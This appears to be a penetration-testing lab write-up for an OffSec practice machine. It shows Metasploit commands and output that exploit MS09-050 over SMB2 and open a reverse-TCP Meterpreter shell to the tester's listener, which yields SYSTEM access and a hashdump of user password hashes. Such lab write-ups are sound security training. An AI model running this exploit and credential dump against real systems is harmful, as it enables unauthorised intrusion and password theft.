InfoSec LAB

MS09-050

The target system has been identified to be vulnerable to MS09-050.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/internal_offsec]
└─$ msfconsole -q                                                                     
[*] Starting persistent handler(s)...
msf6 > search MS09-050
 
Matching Modules
================
 
   #  Name                                                       Disclosure Date  Rank    Check  Description
   -  ----                                                       ---------------  ----    -----  -----------
   0  exploit/windows/smb/ms09_050_smb2_negotiate_func_index     2009-09-07       good    No     MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   1  auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh  .                normal  No     Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   2  auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff     .                normal  No     Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
 
 
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff
 
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Using Metasploit

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set LHOST 192.168.45.218
LHOST => 192.168.45.218
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set RHOSTS 192.168.136.40
RHOSTS => 192.168.136.40

Setting up the target and listening host

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > run
[*] Started reverse TCP handler on 192.168.45.218:4444 
[*] 192.168.136.40:445 - Connecting to the target (192.168.136.40:445)...
[*] 192.168.136.40:445 - Sending the exploit packet (951 bytes)...
[*] 192.168.136.40:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (177734 bytes) to 192.168.136.40
[*] Meterpreter session 1 opened (192.168.45.218:4444 -> 192.168.136.40:49159) at 2025-03-07 21:24:01 +0100
 
meterpreter > shell
Process 1584 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32> whoami
 whoami
nt authority\system
 
C:\Windows\system32> hostname
 hostname
internal
 
C:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.136.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.136.254
 
Tunnel adapter Local Area Connection*:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Tunnel adapter Local Area Connection* 9:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Initial Foothold established to the target system as SYSTEM via exploiting MS09-050 System level compromise

Hashdump

meterpreter > hashdump
aaron:1002:aad3b435b51404eeaad3b435b51404ee:505a9279cfd2f94c658980551cfde735:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:848c583ff88fae9eb8c40e05e3bed204:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
jack:1003:aad3b435b51404eeaad3b435b51404ee:e24106942bf38bcf57a6a4b29016eff6:::
niky:1000:aad3b435b51404eeaad3b435b51404ee:e99eaad9ebc48c3bd0c9734d0c6d106b:::
tim:1001:aad3b435b51404eeaad3b435b51404ee:4c67a94ab3de7684d00a941fae71f966:::

hashdump

InfoSec LAB

Explorer

Internal_OffSec_Exploitation

MS09-050

Hashdump

Interactive Graph View

Table of Contents

Backlinks